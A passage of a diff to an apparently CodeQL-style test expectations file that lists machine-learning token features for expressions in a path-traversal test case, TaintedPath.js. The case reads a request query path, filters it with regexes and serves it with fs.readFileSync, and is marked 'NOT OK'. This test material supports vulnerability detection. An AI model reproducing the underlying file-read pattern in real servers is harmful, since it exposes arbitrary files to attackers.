/[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:129:5:129:36 | path = ... /g, '') | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:129:5:129:36 | path = ... /g, '') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:129:12:129:15 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:129:12:129:15 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:129:12:129:15 | path | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:129:12:129:15 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:129:12:129:15 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:129:12:129:23 | path.replace | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:129:12:129:23 | path.replace | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:129:12:129:23 | path.replace | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:129:12:129:23 | path.replace | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:129:12:129:23 | path.replace | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:129:12:129:36 | exceptional return of path.re ... /g, '') | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:129:12:129:36 | exceptional return of path.re ... /g, '') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:129:12:129:36 | exceptional return of path.re ... /g, '') | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:129:12:129:36 | exceptional return of path.re ... /g, '') | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:129:12:129:36 | exceptional return of path.re ... /g, '') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:129:12:129:36 | path.re ... /g, '') | contextFunctionInterfaces | views_local(req, res) | | autogenerated/TaintedPath/TaintedPath.js:129:12:129:36 | path.re ... /g, '') | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/TaintedPath.js:129:12:129:36 | path.re ... /g, '') | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | | autogenerated/TaintedPath/TaintedPath.js:129:12:129:36 | path.re ... /g, '') | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:129:12:129:36 | path.re ... /g, '') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:129:17:129:23 | replace | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:129:17:129:23 | replace | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:129:17:129:23 | replace | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:129:17:129:23 | replace | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:129:17:129:23 | replace | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:129:25:129:31 | /\\.\\./g | CalleeFlexibleAccessPath | path.replace | | autogenerated/TaintedPath/TaintedPath.js:129:25:129:31 | /\\.\\./g | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:129:25:129:31 | /\\.\\./g | calleeImports | url | @@ -5737,6 +62531,51 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:129:34:129:35 | '' | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:129:34:129:35 | '' | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:129:34:129:35 | '' | receiverName | path | +| autogenerated/TaintedPath/TaintedPath.js:132:3:132:3 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:132:3:132:3 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:132:3:132:3 | path | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:132:3:132:3 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:132:3:132:3 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:132:3:132:5 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:132:3:132:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:132:3:132:5 | res | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:132:3:132:5 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:132:3:132:5 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:132:3:132:11 | res.write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:132:3:132:11 | res.write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:132:3:132:11 | res.write | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:132:3:132:11 | res.write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:132:3:132:11 | res.write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:132:3:132:34 | exceptional return of res.wri ... (path)) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:132:3:132:34 | exceptional return of res.wri ... (path)) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:132:3:132:34 | exceptional return of res.wri ... (path)) | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:132:3:132:34 | exceptional return of res.wri ... (path)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:132:3:132:34 | exceptional return of res.wri ... (path)) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:132:3:132:34 | res.wri ... (path)) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:132:3:132:34 | res.wri ... (path)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:132:3:132:34 | res.wri ... (path)) | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:132:3:132:34 | res.wri ... (path)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:132:3:132:34 | res.wri ... (path)) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:132:7:132:11 | write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:132:7:132:11 | write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:132:7:132:11 | write | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:132:7:132:11 | write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:132:7:132:11 | write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:132:13:132:14 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:132:13:132:14 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:132:13:132:14 | fs | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:132:13:132:14 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:132:13:132:14 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:132:13:132:27 | fs.readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:132:13:132:27 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:132:13:132:27 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:132:13:132:27 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:132:13:132:27 | fs.readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:132:13:132:33 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:132:13:132:33 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:132:13:132:33 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:132:13:132:33 | exceptional return of fs.read ... c(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:132:13:132:33 | exceptional return of fs.read ... c(path) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:132:13:132:33 | fs.read ... c(path) | CalleeFlexibleAccessPath | res.write | | autogenerated/TaintedPath/TaintedPath.js:132:13:132:33 | fs.read ... c(path) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:132:13:132:33 | fs.read ... c(path) | contextFunctionInterfaces | views_local(req, res) | @@ -5745,6 +62584,11 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:132:13:132:33 | fs.read ... c(path) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:132:13:132:33 | fs.read ... c(path) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:132:13:132:33 | fs.read ... c(path) | receiverName | res | +| autogenerated/TaintedPath/TaintedPath.js:132:16:132:27 | readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:132:16:132:27 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:132:16:132:27 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:132:16:132:27 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:132:16:132:27 | readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:132:29:132:32 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/TaintedPath.js:132:29:132:32 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:132:29:132:32 | path | calleeImports | fs | @@ -5754,6 +62598,52 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:132:29:132:32 | path | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:132:29:132:32 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:132:29:132:32 | path | receiverName | fs | +| autogenerated/TaintedPath/TaintedPath.js:135:5:135:10 | server | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:135:5:135:10 | server | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:135:5:135:10 | server | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:135:5:139:2 | server ... T OK\\n}) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:135:5:139:2 | server ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:135:5:139:2 | server ... T OK\\n}) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:135:14:135:17 | http | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:135:14:135:17 | http | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:135:14:135:17 | http | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:135:14:135:30 | http.createServer | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:135:14:135:30 | http.createServer | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:135:14:135:30 | http.createServer | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:135:14:139:2 | exceptional return of http.cr ... T OK\\n}) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:135:14:139:2 | exceptional return of http.cr ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:135:14:139:2 | exceptional return of http.cr ... T OK\\n}) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:135:14:139:2 | http.cr ... T OK\\n}) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:135:14:139:2 | http.cr ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:135:14:139:2 | http.cr ... T OK\\n}) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:135:19:135:30 | createServer | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:135:19:135:30 | createServer | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:135:19:135:30 | createServer | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:135:32:135:31 | require | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:135:32:135:31 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:135:32:135:31 | require | enclosingFunctionBody | req res path url parse req url true query path require send req path | +| autogenerated/TaintedPath/TaintedPath.js:135:32:135:31 | require | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:135:32:135:31 | require | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:135:32:135:31 | this | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:135:32:135:31 | this | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:135:32:135:31 | this | enclosingFunctionBody | req res path url parse req url true query path require send req path | +| autogenerated/TaintedPath/TaintedPath.js:135:32:135:31 | this | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:135:32:135:31 | this | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:135:32:135:31 | url | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:135:32:135:31 | url | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:135:32:135:31 | url | enclosingFunctionBody | req res path url parse req url true query path require send req path | +| autogenerated/TaintedPath/TaintedPath.js:135:32:135:31 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:135:32:135:31 | url | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:135:32:139:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:135:32:139:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:135:32:139:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res path url parse req url true query path require send req path | +| autogenerated/TaintedPath/TaintedPath.js:135:32:139:1 | 'arguments' object of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:135:32:139:1 | 'arguments' object of anonymous function | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:135:32:139:1 | exceptional return of anonymous function | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:135:32:139:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:135:32:139:1 | exceptional return of anonymous function | enclosingFunctionBody | req res path url parse req url true query path require send req path | +| autogenerated/TaintedPath/TaintedPath.js:135:32:139:1 | exceptional return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:135:32:139:1 | exceptional return of anonymous function | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:135:32:139:1 | functio ... OT OK\\n} | CalleeFlexibleAccessPath | http.createServer | | autogenerated/TaintedPath/TaintedPath.js:135:32:139:1 | functio ... OT OK\\n} | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:135:32:139:1 | functio ... OT OK\\n} | calleeImports | http | @@ -5761,6 +62651,81 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:135:32:139:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/TaintedPath.js:135:32:139:1 | functio ... OT OK\\n} | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:135:32:139:1 | functio ... OT OK\\n} | receiverName | http | +| autogenerated/TaintedPath/TaintedPath.js:135:32:139:1 | return of anonymous function | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:135:32:139:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:135:32:139:1 | return of anonymous function | enclosingFunctionBody | req res path url parse req url true query path require send req path | +| autogenerated/TaintedPath/TaintedPath.js:135:32:139:1 | return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:135:32:139:1 | return of anonymous function | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:135:41:135:43 | req | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:135:41:135:43 | req | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:135:41:135:43 | req | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:135:41:135:43 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:135:41:135:43 | req | enclosingFunctionBody | req res path url parse req url true query path require send req path | +| autogenerated/TaintedPath/TaintedPath.js:135:41:135:43 | req | enclosingFunctionBody | req res path url parse req url true query path require send req path | +| autogenerated/TaintedPath/TaintedPath.js:135:41:135:43 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:135:41:135:43 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:135:41:135:43 | req | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:135:41:135:43 | req | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:135:46:135:48 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:135:46:135:48 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:135:46:135:48 | res | enclosingFunctionBody | req res path url parse req url true query path require send req path | +| autogenerated/TaintedPath/TaintedPath.js:135:46:135:48 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:135:46:135:48 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:136:6:136:9 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:136:6:136:9 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:136:6:136:9 | path | enclosingFunctionBody | req res path url parse req url true query path require send req path | +| autogenerated/TaintedPath/TaintedPath.js:136:6:136:9 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:136:6:136:9 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:136:6:136:47 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:136:6:136:47 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:136:6:136:47 | path | enclosingFunctionBody | req res path url parse req url true query path require send req path | +| autogenerated/TaintedPath/TaintedPath.js:136:6:136:47 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:136:6:136:47 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:136:6:136:47 | path = ... ry.path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:136:6:136:47 | path = ... ry.path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:136:6:136:47 | path = ... ry.path | enclosingFunctionBody | req res path url parse req url true query path require send req path | +| autogenerated/TaintedPath/TaintedPath.js:136:6:136:47 | path = ... ry.path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:136:6:136:47 | path = ... ry.path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:136:13:136:15 | url | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:136:13:136:15 | url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:136:13:136:15 | url | enclosingFunctionBody | req res path url parse req url true query path require send req path | +| autogenerated/TaintedPath/TaintedPath.js:136:13:136:15 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:136:13:136:15 | url | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:136:13:136:21 | url.parse | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:136:13:136:21 | url.parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:136:13:136:21 | url.parse | enclosingFunctionBody | req res path url parse req url true query path require send req path | +| autogenerated/TaintedPath/TaintedPath.js:136:13:136:21 | url.parse | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:136:13:136:21 | url.parse | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:136:13:136:36 | exceptional return of url.par ... , true) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:136:13:136:36 | exceptional return of url.par ... , true) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:136:13:136:36 | exceptional return of url.par ... , true) | enclosingFunctionBody | req res path url parse req url true query path require send req path | +| autogenerated/TaintedPath/TaintedPath.js:136:13:136:36 | exceptional return of url.par ... , true) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:136:13:136:36 | exceptional return of url.par ... , true) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:136:13:136:36 | url.par ... , true) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:136:13:136:36 | url.par ... , true) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:136:13:136:36 | url.par ... , true) | enclosingFunctionBody | req res path url parse req url true query path require send req path | +| autogenerated/TaintedPath/TaintedPath.js:136:13:136:36 | url.par ... , true) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:136:13:136:36 | url.par ... , true) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:136:13:136:42 | url.par ... ).query | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:136:13:136:42 | url.par ... ).query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:136:13:136:42 | url.par ... ).query | enclosingFunctionBody | req res path url parse req url true query path require send req path | +| autogenerated/TaintedPath/TaintedPath.js:136:13:136:42 | url.par ... ).query | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:136:13:136:42 | url.par ... ).query | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:136:13:136:47 | url.par ... ry.path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:136:13:136:47 | url.par ... ry.path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:136:13:136:47 | url.par ... ry.path | enclosingFunctionBody | req res path url parse req url true query path require send req path | +| autogenerated/TaintedPath/TaintedPath.js:136:13:136:47 | url.par ... ry.path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:136:13:136:47 | url.par ... ry.path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send 